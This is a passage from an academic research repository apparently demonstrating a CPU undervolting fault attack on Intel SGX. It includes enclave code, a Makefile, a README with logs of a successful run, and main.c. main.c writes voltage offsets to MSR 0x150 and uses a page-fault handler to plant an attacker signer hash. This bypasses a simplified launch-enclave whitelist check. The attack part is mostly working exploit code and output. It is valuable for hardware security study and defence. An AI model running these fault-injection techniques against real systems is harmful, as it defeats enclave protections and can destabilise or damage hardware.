 5 |   <StackMaxSize>0x40000</StackMaxSize>
 6 |   <HeapMaxSize>0x400000</HeapMaxSize>
 7 |   <TCSNum>1</TCSNum>
 8 |   <TCSPolicy>1</TCSPolicy>
 9 |   <DisableDebug>0</DisableDebug>
10 | </EnclaveConfiguration>
11 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/Enclave/encl.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  This file is part of the SGX-Step enclave execution control framework.
  3 |  *
  4 |  *  Copyright (C) 2017 Jo Van Bulck <jo.vanbulck@cs.kuleuven.be>,
  5 |  *                     Raoul Strackx <raoul.strackx@cs.kuleuven.be>
  6 |  *
  7 |  *  SGX-Step is free software: you can redistribute it and/or modify
  8 |  *  it under the terms of the GNU General Public License as published by
  9 |  *  the Free Software Foundation, either version 3 of the License, or
 10 |  *  (at your option) any later version.
 11 |  *
 12 |  *  SGX-Step is distributed in the hope that it will be useful,
 13 |  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 |  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 15 |  *  GNU General Public License for more details.
 16 |  *
 17 |  *  You should have received a copy of the GNU General Public License
 18 |  *  along with SGX-Step. If not, see <http://www.gnu.org/licenses/>.
 19 |  */
 20 | #include <stdio.h>
 21 | #include <string.h>
 22 | #include "sgx_tcrypto.h"
 23 | #include "sgx_trts.h"
 24 | #include "encl_t.h"	// for ocall
 25 | 
 26 | static void eprintf(const char *fmt, ...)
 27 | {
 28 | 	char buf[1000] = {'\0'};
 29 | 	va_list ap;
 30 | 	va_start(ap, fmt);
 31 | 	vsnprintf(buf, 1000, fmt, ap);
 32 | 	va_end(ap);
 33 | 	ocall_print_string(buf);
 34 | }
 35 | 
 36 | #define MAGIC_OFFSET 0x8ce05
 37 | #define ARR_LEN     MAGIC_OFFSET + 1001
 38 | #define SECRET_LEN  8
 39 | struct_foo_t secret_array[ARR_LEN];
 40 | uint32_t enclave_secret = 0xdeadbeef;
 41 | 
 42 | #if 1
 43 |     void do_init_secret(struct_foo_t *arr, uint64_t offset)
 44 |     {
 45 |         struct_foo_t *foo = &arr[offset];
 46 |         foo->foo[0] = enclave_secret;
 47 |     }
 48 | #else
 49 |     __attribute__((optimize("O0")))
 50 |     void do_init_secret(struct_foo_t *arr, uint64_t offset)
 51 |     {
 52 |         for (int j = 0; j < SECRET_LEN; j++)
 53 |         {
 54 |             asm volatile("" ::: "memory"); 
 55 |             volatile struct_foo_t *foo = &arr[offset];
 56 |             foo->foo[0] = enclave_secret;
 57 |             asm volatile("" ::: "memory"); 
 58 |         }
 59 |     }
 60 | #endif
 61 | 
 62 | __attribute__((optimize("O0"))) 
 63 | void my_ecall(void)
 64 | {
 65 |     for (int i = 0; i < 1000; i++)
 66 | 	{
 67 | 		//asm volatile("" ::: "memory"); 
 68 |         do_init_secret(secret_array, MAGIC_OFFSET+i);
 69 | 		//asm volatile("" ::: "memory"); 
 70 | 	}
 71 | }
 72 | 
 73 | /* ---------------------------------------------------------------------- */
 74 | 
 75 | #define REF_LE_WL_SIZE      (MAGIC_OFFSET + 1001)
 76 | 
 77 | /* From: https://github.com/intel/linux-sgx/blob/master/psw/ae/ref_le/ref_le.cpp#L47 */
 78 | // staticly allocate the white list cache - all the values in the cache are in little endian
 79 | ref_le_white_list_entry_t g_ref_le_white_list_cache[REF_LE_WL_SIZE] = { 0 };
 80 | 
 81 | void init_wl(void)
 82 | {
 83 |     memset(g_ref_le_white_list_cache, 0x00, sizeof(ref_le_white_list_entry_t) * REF_LE_WL_SIZE);
 84 | }
 85 | 
 86 | int check_wl_entry(size_t idx, sgx_measurement_t *mrsigner, int provision)
 87 | {
 88 |     /* From: https://github.com/intel/linux-sgx/blob/master/psw/ae/ref_le/ref_le.cpp#L220 */
 89 |     ref_le_white_list_entry_t *current_entry = &g_ref_le_white_list_cache[idx];
 90 | 
 91 |     if (memcmp(&(current_entry->mr_signer), mrsigner, sizeof(sgx_measurement_t)) == 0)
 92 |         return (provision ? current_entry->provision_key : 1);
 93 | 
 94 |     return 0;
 95 | }
 96 | 
 97 | __attribute__((optimize("O0"))) 
 98 | int get_launch_token(size_t *it, sgx_measurement_t mrsigner, int provision)
 99 | {
100 |     for (size_t i = 0; i < REF_LE_WL_SIZE; i++)
101 |     {
102 |         if (check_wl_entry(i, &mrsigner, provision))
103 |         {
104 |             return 1;
105 |         }
106 | 
107 |         /* NOTE: we explicitly leak the loop iteration to simplify things;
108 |          * real-world adversaries could simply use a #PF side-channel or count
109 |          * instructions w precise single-stepping
110 |          */
111 |         *it = i;
112 |     } 
113 | 
114 |     return 0;
115 | }
116 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/Enclave/encl.edl:
--------------------------------------------------------------------------------
 1 | enclave {
 2 | 
 3 |     include "ref_le.h"
 4 | 
 5 |     struct struct_foo_t {
 6 |         uint32_t foo[8];
 7 |         uint8_t foo2;
 8 |     }; 
 9 | 
10 | 	trusted {
11 | 		public void my_ecall(void);
12 |         public void init_wl(void);
13 | 		public int get_launch_token([user_check] size_t *it, sgx_measurement_t mrsigner, int provision);
14 | 	};
15 | 	
16 | 	untrusted {
17 | 		void ocall_print_string([in, string] const char *str);
18 | 	};
19 | };
20 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/Enclave/ref_le.h:
--------------------------------------------------------------------------------
 1 | #include "sgx_report.h"
 2 | 
 3 | #if 0
 4 |     /* From https://github.com/intel/linux-sgx/blob/master/psw/ae/inc/internal/ref_le.h */
 5 |     
 6 |     /* All fields are big endian */
 7 |     
 8 |     #pragma pack(push, 1)
 9 |     
10 |     typedef struct _ref_le_white_list_entry_t
11 |     {
12 |         uint8_t                     provision_key;
13 |         uint8_t                     match_mr_enclave;
14 |         uint8_t                     reserved[6]; // align the measurment on 64 bits
15 |         sgx_measurement_t           mr_signer;
16 |         sgx_measurement_t           mr_enclave;
17 |     } ref_le_white_list_entry_t;
18 |     
19 |     #pragma pack(pop)
20 | #else
21 |     typedef struct _ref_le_white_list_entry_t
22 |     {
23 |         sgx_measurement_t           mr_signer;
24 |         uint8_t                     provision_key;
25 |     } ref_le_white_list_entry_t;
26 | #endif
27 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/Makefile:
--------------------------------------------------------------------------------
 1 | LIBSGXSTEP_DIR       = ../sgx-step/
 2 | LIBSGXSTEP           = $(LIBSGXSTEP_DIR)/libsgxstep
 3 | URTS_LIB_PATH        = $(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
 4 | 
 5 | ifeq ($(SGX_SDK),)
 6 |     SGX_SDK          = /opt/intel/sgxsdk
 7 | endif
 8 | export SGX_SDK
 9 | ifneq ($(SGX_SDK), /opt/intel/sgxsdk)
10 |     URTS_LD_LIBRARY_PATH = LD_LIBRARY_PATH=$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
11 | endif
12 | 
13 | ENCLAVE              = Enclave
14 | SUBDIRS              = $(ENCLAVE) $(LIBSGXSTEP)
15 | 
16 | CC                   = gcc
17 | AS                   = gcc
18 | LD                   = gcc
19 | 
20 | ifeq ($(M32), 1)
21 | 	CFLAGS   = -m32 -DM32=$(M32)
22 | 	LDFLAGS  = -m32
23 | else
24 | 	LIB_SUFX = 64
25 | endif
26 | 
27 | CFLAGS              += -fPIC -fno-stack-protector -fno-builtin -fno-jump-tables \
28 |                        -fno-common -Wno-attributes -g -D_GNU_SOURCE -O0
29 | INCLUDE             += -I$(SGX_SDK)/include/ -I$(LIBSGXSTEP_DIR) 
30 | LDFLAGS             += -lsgx-step -lencl_proxy -lsgx_urts \
31 |                        -lsgx_uae_service -pthread $(SUBDIRS:%=-L %) -L$(SGX_SDK)/lib$(LIB_SUFX)/ \
32 |                        -L$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
33 | 
34 | SOURCES              = $(shell ls *.c)
35 | OBJECTS              = $(SOURCES:.c=.o)
36 | OUTPUT               = app
37 | 
38 | BUILDDIRS            = $(SUBDIRS:%=build-%)
39 | CLEANDIRS            = $(SUBDIRS:%=clean-%)
40 | 
41 | .SILENT:
42 | all: $(OUTPUT)
43 | 	
44 | run: clean all
45 | 	sudo $(URTS_LD_LIBRARY_PATH) taskset -c 0,2 ./$(OUTPUT) ${ARGS}
46 | 
47 | debug: clean all
48 | 	sudo `which sgx-gdb` ./$(OUTPUT)
49 | 
50 | $(OUTPUT): $(BUILDDIRS) $(OBJECTS)
51 | 	echo "$(INDENT)[LD]" $(OBJECTS) $(LIBS) -o $(OUTPUT) 
52 | 	$(LD) $(OBJECTS) $(LDFLAGS) -o $(OUTPUT) 
53 | 
54 | %.o : %.c
55 | 	echo "$(INDENT)[CC] " $<
56 | 	$(CC) $(CFLAGS) $(INCLUDE) -c $<
57 | 
58 | %.o : %.S
59 | 	echo "$(INDENT)[AS] " $<
60 | 	$(AS) $(INCLUDE) -c $< -o $@
61 | 
62 | clean: $(CLEANDIRS)
63 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT)
64 | 	rm -f $(OBJECTS) $(OUTPUT)
65 | 
66 | $(BUILDDIRS):
67 | 	echo "$(INDENT)[===] $(@:build-%=%) [===]"
68 | 	$(MAKE) -C $(@:build-%=%) INDENT+="$(INDENT_STEP)" M32=$(M32) curr-dir=$(curr-dir)/$(@:build-%=%)
69 | 
70 | $(CLEANDIRS):
71 | 	echo "$(INDENT)[===] $(@:clean-%=%) [===]"
72 | 	$(MAKE) clean -C $(@:clean-%=%) INDENT+="$(INDENT_STEP)" curr-dir=$(curr-dir)/$(@:build-%=%)
73 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/README.md:
--------------------------------------------------------------------------------
  1 | # Example V.A: Launch Enclave Application Scenario
  2 | 
  3 | As usual, you need SGX-Step. As usual, we assume it is in `../sgx-step/` - adapt the Makefile (`LIBSGXSTEP_DIR`) if needed. We also assume the SGX-SDK is correctly setup and the environment sourced.
  4 | 
  5 | Run on our i3-7100U-C with -118 mV:
  6 | 
  7 | ```
  8 | jo@jo-nuc:~/cpu-faults/sgx-struct-array-index$ sudo ./app 200 -118
  9 | Creating enclave...
 10 | ==== Victim Enclave ====
 11 | [pt.c] /dev/sgx-step opened!
 12 |     Base:   0x7f1854000000
 13 |     Size:   67108864
 14 |     Limit:  0x7f1858000000
 15 |     TCS:    0x7f1856c82000
 16 |     SSA:    0x7f1856c83f48
 17 |     AEP:    0x7f185d323805
 18 |     EDBGRD: debug
 19 | [main.c] calling enclave; sizeof(struct_foo_t)=36
 20 | Signal 11 received
 21 | siginfo address = 7f18367fc000
 22 | Will now map to 7f18367fc000
 23 | enclave iteration=573569; base_adrs=0x7f18555efe80
 24 | adrs(RDI)=0x7f18367fcf42; idx=0xffffffffe120d0c2; expected=0x120d0a1 xor=0xffffffffe0000063
 25 | attacker computed: adrs=0x7f18367fcf42
 26 | enclave computed:  adrs=0x7f18367fcf42
 27 | [main.c] Fault fault fault!!!
 28 | [main.c] Done. enclave returned allowed=1
 29 | 
 30 | 
 31 | jo@jo-nuc:~/cpu-faults/sgx-struct-array-index$ sensors
 32 | iwlwifi-virtual-0
 33 | Adapter: Virtual device
 34 | temp1:            N/A  
 35 | 
 36 | acpitz-virtual-0
 37 | Adapter: Virtual device
 38 | temp1:       -263.2°C  
 39 | 
 40 | coretemp-isa-0000
 41 | Adapter: ISA adapter
 42 | Package id 0:  +45.0°C  (high = +100.0°C, crit = +100.0°C)
 43 | Core 0:        +44.0°C  (high = +100.0°C, crit = +100.0°C)
 44 | Core 1:        +42.0°C  (high = +100.0°C, crit = +100.0°C)
 45 | 
 46 | pch_skylake-virtual-0
 47 | Adapter: Virtual device
 48 | temp1:        +43.0°C  
 49 | 
 50 | jo@jo-nuc:~/cpu-faults/sgx-struct-array-index$ cat /proc/cpuinfo | grep Hz
 51 | model name	: Intel(R) Core(TM) i3-7100U CPU @ 2.40GHz
 52 | cpu MHz		: 2000.110
 53 | model name	: Intel(R) Core(TM) i3-7100U CPU @ 2.40GHz
 54 | cpu MHz		: 2000.000
 55 | model name	: Intel(R) Core(TM) i3-7100U CPU @ 2.40GHz
 56 | cpu MHz		: 2000.305
 57 | model name	: Intel(R) Core(TM) i3-7100U CPU @ 2.40GHz
 58 | cpu MHz		: 2002.713
 59 | 
 60 | 
 61 | jo@jo-nuc:~/cpu-faults/sgx-struct-array-index$ sudo ./app 200 0
 62 | Creating enclave...
 63 | ==== Victim Enclave ====
 64 | [pt.c] /dev/sgx-step opened!
 65 |     Base:   0x7f0494000000
 66 |     Size:   67108864
 67 |     Limit:  0x7f0498000000
 68 |     TCS:    0x7f0496c82000
 69 |     SSA:    0x7f0496c83f48
 70 |     AEP:    0x7f049a405805
 71 |     EDBGRD: debug
 72 | [main.c] calling enclave; sizeof(struct_foo_t)=36
 73 | [main.c] 100/200
 74 | [main.c] Done. enclave returned allowed=0
 75 | 
 76 | 
 77 | jo@jo-nuc:~/cpu-faults/sgx-struct-array-index$ objdump -D Enclave/encl.so | grep "check_wl_entry" -A 20
 78 | 0000000000000ca1 <_Z14check_wl_entrymP18_sgx_measurement_ti>:
 79 |      ca1:	48 6b ff 21          	imul   $0x21,%rdi,%rdi
 80 |      ca5:	55                   	push   %rbp
 81 |      ca6:	53                   	push   %rbx
 82 |      ca7:	48 8d 1d d2 f1 5e 01 	lea    0x15ef1d2(%rip),%rbx        # 15efe80 <g_ref_le_white_list_cache>
 83 |      cae:	89 d5                	mov    %edx,%ebp
 84 |      cb0:	ba 20 00 00 00       	mov    $0x20,%edx
 85 |      cb5:	48 83 ec 08          	sub    $0x8,%rsp
 86 |      cb9:	48 01 fb             	add    %rdi,%rbx
 87 |      cbc:	48 89 df             	mov    %rbx,%rdi
 88 |      cbf:	e8 5c 66 00 00       	callq  7320 <memcmp>
 89 |      cc4:	31 d2                	xor    %edx,%edx
 90 |      cc6:	85 c0                	test   %eax,%eax
 91 |      cc8:	75 0d                	jne    cd7 <_Z14check_wl_entrymP18_sgx_measurement_ti+0x36>
 92 |      cca:	85 ed                	test   %ebp,%ebp
 93 |      ccc:	ba 01 00 00 00       	mov    $0x1,%edx
 94 |      cd1:	74 04                	je     cd7 <_Z14check_wl_entrymP18_sgx_measurement_ti+0x36>
 95 |      cd3:	0f b6 53 20          	movzbl 0x20(%rbx),%edx
 96 |      cd7:	89 d0                	mov    %edx,%eax
 97 |      cd9:	5a                   	pop    %rdx
 98 |      cda:	5b                   	pop    %rbx
 99 |      cdb:	5d                   	pop    %rbp
100 |      cdc:	c3                   	retq   
101 |      cdd:	0f 1f 00             	nopl   (%rax)
102 | 
103 | 0000000000000ce0 <get_launch_token>:
104 |      ce0:	48 83 ec 28          	sub    $0x28,%rsp
105 |      ce4:	48 89 7c 24 08       	mov    %rdi,0x8(%rsp)
106 |      ce9:	89 74 24 04          	mov    %esi,0x4(%rsp)
107 |      ced:	48 c7 44 24 18 00 00 	movq   $0x0,0x18(%rsp)
108 |      cf4:	00 00 
109 |      cf6:	48 81 7c 24 18 ed d1 	cmpq   $0x8d1ed,0x18(%rsp)
110 |      cfd:	08 00 
111 |      cff:	77 3b                	ja     d3c <get_launch_token+0x5c>
112 |      d01:	8b 54 24 04          	mov    0x4(%rsp),%edx
113 |      d05:	48 8b 44 24 18       	mov    0x18(%rsp),%rax
114 |      d0a:	48 8d 74 24 30       	lea    0x30(%rsp),%rsi
115 | --
116 |      d12:	e8 8a ff ff ff       	callq  ca1 <_Z14check_wl_entrymP18_sgx_measurement_ti>
117 |      d17:	85 c0                	test   %eax,%eax
118 |      d19:	0f 95 c0             	setne  %al
119 |      d1c:	84 c0                	test   %al,%al
120 |      d1e:	74 07                	je     d27 <get_launch_token+0x47>
121 |      d20:	b8 01 00 00 00       	mov    $0x1,%eax
122 |      d25:	eb 1a                	jmp    d41 <get_launch_token+0x61>
123 |      d27:	48 8b 44 24 08       	mov    0x8(%rsp),%rax
124 |      d2c:	48 8b 54 24 18       	mov    0x18(%rsp),%rdx
125 |      d31:	48 89 10             	mov    %rdx,(%rax)
126 |      d34:	48 83 44 24 18 01    	addq   $0x1,0x18(%rsp)
127 |      d3a:	eb ba                	jmp    cf6 <get_launch_token+0x16>
128 |      d3c:	b8 00 00 00 00       	mov    $0x0,%eax
129 |      d41:	48 83 c4 28          	add    $0x28,%rsp
130 |      d45:	c3                   	retq   
131 | 
132 | 0000000000000d46 <sgx_init_wl>:
133 |      d46:	48 85 ff             	test   %rdi,%rdi
134 |      d49:	75 0d                	jne    d58 <sgx_init_wl+0x12>
135 |      d4b:	48 83 ec 08          	sub    $0x8,%rsp
136 |      d4f:	e8 39 ff ff ff       	callq  c8d <init_wl>
137 | 
138 | ```
139 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/main.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  This file is part of the SGX-Step enclave execution control framework.
  3 |  *
  4 |  *  Copyright (C) 2017 Jo Van Bulck <jo.vanbulck@cs.kuleuven.be>,
  5 |  *                     Raoul Strackx <raoul.strackx@cs.kuleuven.be>
  6 |  *
  7 |  *  SGX-Step is free software: you can redistribute it and/or modify
  8 |  *  it under the terms of the GNU General Public License as published by
  9 |  *  the Free Software Foundation, either version 3 of the License, or
 10 |  *  (at your option) any later version.
 11 |  *
 12 |  *  SGX-Step is distributed in the hope that it will be useful,
 13 |  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 |  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 15 |  *  GNU General Public License for more details.
 16 |  *
 17 |  *  You should have received a copy of the GNU General Public License
 18 |  *  along with SGX-Step. If not, see <http://www.gnu.org/licenses/>.
 19 |  */
 20 | 
 21 | #include <sgx_urts.h>
 22 | #include "Enclave/encl_u.h"
 23 | #include <sys/mman.h>
 24 | #include <signal.h>
 25 | 
 26 | #include "libsgxstep/enclave.h"
 27 | #include "libsgxstep/debug.h"
 28 | #include "libsgxstep/pt.h"
 29 | #include "libsgxstep/sched.h"
 30 | 
 31 | #include <stdint.h>
 32 | #include <stdio.h>
 33 | #include <fcntl.h>
 34 | #include <unistd.h>
 35 | #include <stdlib.h>
 36 | #include <inttypes.h>
 37 | #include <time.h>
 38 | #include <pthread.h>
 39 | 
 40 | int64_t my_round(float num)
 41 | {
 42 |     return num < 0 ? num - 0.5 : num + 0.5;
 43 | }
 44 | 
 45 | volatile uint64_t not_used = 0xdead;
 46 | 
 47 | void pause_it(int pause_iterations)
 48 | {
 49 | 	for (int j = 0; j < pause_iterations; j++)
 50 | 	{
 51 | 		not_used = not_used * 0x12345;
 52 | 	}
 53 | }
 54 | 
 55 | uint64_t wrmsr_value(char* in,uint64_t plane)
 56 | {
 57 |       int64_t val=strtol(in,NULL,10);
 58 |       val=my_round(val*1.024);
 59 |       val=0xFFE00000&((val&0xFFF)<<21);
 60 |       val=val|0x8000001100000000;
 61 |       val=val|(plane<<40);
 62 |       return (uint64_t)val;
 63 | }
 64 | 
 65 | /* OCall functions */
 66 | void ocall_print_string(const char *str)
 67 | {
 68 | 	/* Proxy/Bridge will check the length and null-terminate 
 69 | 	 * the input string to prevent buffer overflow. 
 70 | 	 */
 71 | 	printf("\t[Enclave] %s\n", str);
 72 | }
 73 | 
 74 | static void hexdump(uint8_t* a, size_t cnt)
 75 | {
 76 | 	for(size_t i = 0; i < cnt; i++)
 77 | 	{
 78 | 		if(i % 16 == 0 && i != 0)
 79 | 		{
 80 | 			printf("\n");
 81 | 		}
 82 | 		printf("%02x ", a[i]);
 83 | 	}
 84 | }
 85 | 
 86 | volatile int flag1 = 0, flag2 = 0;
 87 | int fd0 = 0;
 88 | 
 89 | uint64_t val_plane0 = 0;
 90 | uint64_t val_plane2 = 0;
 91 | uint64_t val_zero_plane0 = 0;
 92 | uint64_t val_zero_plane2 = 0;
 93 | uint64_t tick = 0;
 94 | 
 95 | // Handle the page fault in thread dummy_page
 96 | static uint8_t page_mapped = 0;
 97 | static void* page = 0;
 98 | size_t it = 0;
 99 | 
100 | sgx_measurement_t attacker_mrsigner = {
101 |     .m = {0xf0, 0x88, 0xeb, 0x84, 0x5e, 0x3f, 0x5f, 0xd6, 
102 |           0x91, 0xe8, 0x07, 0x94, 0x2a, 0x42, 0x3d, 0xc6, 
103 |           0x5f, 0x42, 0x1c, 0x35, 0xd7, 0x9d, 0x5a, 0x60, 
104 |           0xc0, 0x19, 0x36, 0x7a, 0x72, 0xe3, 0x81, 0x70}
105 | };
106 | 
107 | void fault_handler(int signo, siginfo_t *info, void *extra)
108 | {
109 | 	pwrite(fd0,&val_zero_plane0,sizeof val_zero_plane0,0x150);
110 | 	pwrite(fd0,&val_zero_plane2,sizeof val_zero_plane2,0x150);
111 | 	
112 | 	ucontext_t *p=(ucontext_t *)extra;
113 | 	int x;
114 | 
115 | 	printf("Signal %d received\n", signo);
116 | 	printf("siginfo address = %lx\n", info->si_addr);
117 | 
118 | 	uint64_t page_addr = (((uint64_t)info->si_addr) & ~(getpagesize()-1));
119 | 	printf("Will now map to %lx\n", page_addr);
120 | 
121 |     page = mmap((void*)page_addr, getpagesize(), PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
122 | 
123 | 	if(page == MAP_FAILED)
124 | 	{
125 | 		perror("mmap() failed");
126 | 	}
127 | 	page_mapped = 1;
128 | 
129 |     /* ---------------------------------------------------------------------- */
130 |     gprsgx_region_t gprsgx;
131 |     edbgrd(get_enclave_ssa_gprsgx_adrs(), &gprsgx, sizeof(gprsgx_region_t));
132 | 
133 |     uint64_t eadrs = gprsgx.fields.rdi, base = ((uint64_t)get_enclave_base()) + 0x15efe80;
134 |     uint64_t idx = (eadrs - base), expected = 0x21*it;
135 |     uint64_t expected_xor = 0xffffffffe0000063; //constant on my machine (jo-nuc)
136 | 
137 |     printf("enclave iteration=%d; base_adrs=%p\n", it, base);
138 |     printf("adrs(RDI)=%p; idx=%p; expected=%p xor=%p\n", eadrs, idx, expected, expected ^ idx);
139 | 
140 |     /* NOTE: we assume the attacker knows the current loop iteration (e.g.,
141 |      * side-channel analysis through page faults or interrupt counting */
142 |     uint64_t attacker_adrs = base+(expected ^ expected_xor);
143 |     printf("attacker computed: adrs=%p\n", attacker_adrs);
144 |     printf("enclave computed:  adrs=%p\n", base+idx);
145 | 
146 |     memset(page, 0xff, 4096);
147 |     memcpy((void*) attacker_adrs, &attacker_mrsigner, sizeof(sgx_measurement_t));
148 |     /* ---------------------------------------------------------------------- */
149 | 
150 |     /* continue enclave w page mapped in */
151 | }
152 | 
153 | int main(int argc, char **argv)
154 | {
155 | 	sgx_launch_token_t token = {0};
156 | 	int retval = 0, updated = 0;
157 | 	char old = 0x00, new = 0xbb;
158 | 	sgx_enclave_id_t eid = 0;
159 | 	uint8_t ret = 0;
160 |     int allowed = 0;
161 | 
162 |     const char* program = argv[0];
163 | 
164 |     if (argc != 3)
165 |     {
166 |         printf("Need 2 args: %s iterations offset\n",program);
167 |         exit (-1);
168 |     }
169 | 
170 | 	val_plane0 = wrmsr_value(argv[2],0);
171 |     val_plane2 = wrmsr_value(argv[2],2);
172 | 
173 |     uint32_t iterations = atoi(argv[1]);
174 |     uint32_t iterations_50k = 50000-iterations;
175 | 
176 |     val_zero_plane0 = wrmsr_value("0",0);
177 |     val_zero_plane2 = wrmsr_value("0",2);
178 | 
179 |     fd0 = open("/dev/cpu/0/msr", O_WRONLY);
180 | 
181 |     if(fd0 == -1)
182 |     {
183 |         printf("Could not open /dev/cpu/0/msr\n");
184 |         return -1;
185 |     }
186 | 
187 | 	printf("Creating enclave...\n");
188 | 
189 | 	SGX_ASSERT( sgx_create_enclave( "./Enclave/encl.so", /*debug=*/ 1,
190 | 		&token, &updated, &eid, NULL ) );
191 | 
192 | 	print_enclave_info();
193 | 
194 | 	// Install pf handler
195 | 	struct sigaction sa;
196 |     sa.sa_flags = SA_SIGINFO;
197 |     sigemptyset(&sa.sa_mask);
198 |     sa.sa_sigaction = fault_handler;
199 | 	if (sigaction(SIGSEGV, &sa, NULL) == -1) {
200 | 		perror("sigusr: sigaction");
201 | 		exit(1);
202 | 	}
203 | 
204 |     SGX_ASSERT( init_wl(eid) );
205 | 	info("calling enclave; sizeof(struct_foo_t)=%d", sizeof(struct_foo_t));
206 | 
207 | 	for(int i = 0; i < iterations && page_mapped == 0 ; i++)
208 | 	{
209 | 		if(i % 100 == 0 && i != 0)
210 | 		{
211 | 			info("%d/%d", i, iterations);
212 | 		}
213 | 
214 | 		if(i > 5)
215 | 		{
216 | 			pwrite(fd0,&val_plane0,sizeof val_plane0,0x150);
217 | 			pwrite(fd0,&val_plane2,sizeof val_plane2,0x150);
218 | 		}
219 | 
220 | 		
221 | 		asm volatile("" ::: "memory"); 
222 |         #if 0
223 |             SGX_ASSERT( my_ecall(eid) );
224 |         #else
225 |             it = 0;
226 |             SGX_ASSERT( get_launch_token(eid, &allowed, &it, attacker_mrsigner, /*provision=*/1) );
227 |         #endif
228 | 		asm volatile("" ::: "memory"); 
229 | 		
230 | 		pwrite(fd0,&val_zero_plane0,sizeof val_zero_plane0,0x150);
231 | 		pwrite(fd0,&val_zero_plane2,sizeof val_zero_plane2,0x150);
232 | 
233 | 		pause_it(5000);
234 | 	}
235 | 
236 | 	if(page_mapped != 0)
237 | 	{
238 | 		info("Fault fault fault!!!");
239 | 
240 |         #if 0
241 | 		uint8_t* pp = (uint8_t*) page;
242 | 		for(int k = 0; k < getpagesize(); k++)
243 | 		{
244 | 			printf("%02x", pp[k]);
245 | 			if(k % 32 == 31)
246 | 				printf("\n");
247 | 		}
248 |         #endif
249 | 	}
250 | 
251 | 
252 |     close(fd0);
253 | 
254 |     info("Done. enclave returned allowed=%d", allowed);
255 | 
256 | done:
257 | 
258 | 	return 0;
259 | }
260 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/Enclave/Makefile:
--------------------------------------------------------------------------------
  1 | C		  = gcc
  2 | AR		  = ar
  3 | LD		  = gcc
  4 | EDGER		  = sgx_edger8r
  5 | SIGNER		  = sgx_sign
  6 | INCLUDE       += -I$(SGX_SDK)/include/ -I$(SGX_SDK)/include/tlibc  -I$(SGX_SDK)/include/ipp -Iinternal/
  7 | 
  8 | T_CFLAGS	  = $(CFLAGS) -maes -fvisibility=hidden -fpie -fstack-protector -g -Os
  9 | U_CFLAGS	  = $(CFLAGS) -fvisibility=hidden -fpie -fstack-protector -g
 10 | AR_FLAGS	  = rcs
 11 | OBJECTS		  = encl.o 
 12 | LIB_SGX_TRTS      = -lsgx_trts
 13 | LIB_SGX_TSERVICE  = -lsgx_tservice
 14 | 
 15 | ifeq ($(M32), 1)
 16 | 	T_CFLAGS += -m32 -msse2 -DM32=1
 17 | 	U_CFLAGS += -m32 -msse2
 18 | 	LD_FLAGS  = -m32
 19 | else
 20 | 	LIB_SUFX  = 64
 21 | endif
 22 | 
 23 | ENCLAVE_LIBS      = $(LIB_SGX_TRTS)
 24 | ENCLAVE_LIB_PARTS = -lsgx_tstdc -lsgx_tcrypto $(LIB_SGX_TSERVICE)
 25 | ENCLAVE	          = encl
 26 | PRIVATE_KEY       = private_key.pem
 27 | PUBLIC_KEY        = public_key.pem
 28 | KEY_SIZE          = 3072
 29 | ENCLAVE_EDL       = $(ENCLAVE).edl
 30 | ENCLAVE_CONFIG    = $(ENCLAVE).config.xml
 31 | OUTPUT_T          = $(ENCLAVE).so
 32 | OUTPUT_T_UNSIG    = $(ENCLAVE).unsigned.so
 33 | OUTPUT_U          = lib$(ENCLAVE)_proxy.a
 34 | LIB_DIRS          = -L $(SGX_SDK)/lib$(LIB_SUFX)/
 35 | LD_FLAGS         += -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles \
 36 |                     -Wl,--whole-archive -Wl,--start-group $(ENCLAVE_LIBS) -Wl,--end-group \
 37 |                     -Wl,--no-whole-archive -Wl,--start-group $(ENCLAVE_LIB_PARTS) -Wl,--end-group \
 38 |                     -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \
 39 |                     -Wl,-pie,-eenclave_entry -Wl,--export-dynamic  \
 40 |                     -Wl,--defsym,__ImageBase=0 
 41 | TRUSTED_OBJECTS   = $(ENCLAVE)_t.o
 42 | UNTRUSTED_OBJECTS = $(ENCLAVE)_u.o 
 43 | TRUSTED_CODE      = $(ENCLAVE)_t.h $(ENCLAVE)_t.c
 44 | UNTRUSTED_CODE    = $(ENCLAVE)_u.h $(ENCLAVE)_u.c
 45 | 
 46 | #.SILENT:
 47 | all: $(OUTPUT_T) $(OUTPUT_U)
 48 | 
 49 | $(OUTPUT_T) : $(TRUSTED_OBJECTS) $(OBJECTS) $(PRIVATE_KEY)
 50 | 	echo "$(INDENT)[LD]  " $(OBJECTS) $(TRUSTED_OBJECTS) $(ENCLAVE_LIBS) $(ENCLAVE_LIBS_PARTS) $(OUTPUT_T_UNSIG)
 51 | 	$(LD) $(OBJECTS) $(TRUSTED_OBJECTS) $(LD_FLAGS) $(LIB_DIRS) -o $(OUTPUT_T_UNSIG) 
 52 | 	
 53 | 	echo "$(INDENT)[SGN]" $(OUTPUT_T_UNSIG)
 54 | 	$(SIGNER) sign -key $(PRIVATE_KEY) -enclave $(OUTPUT_T_UNSIG) -out $(OUTPUT_T) -config $(ENCLAVE_CONFIG) > /dev/null 2> /dev/null
 55 | 
 56 | $(OUTPUT_U) : $(UNTRUSTED_OBJECTS) 
 57 | 	echo "$(INDENT)[AR]  " $(OUTPUT_U)
 58 | 	$(AR) $(AR_FLAGS) $(OUTPUT_U) $(UNTRUSTED_OBJECTS) 
 59 | 	
 60 | %_t.o : $(subst .o,.c,$@) edger
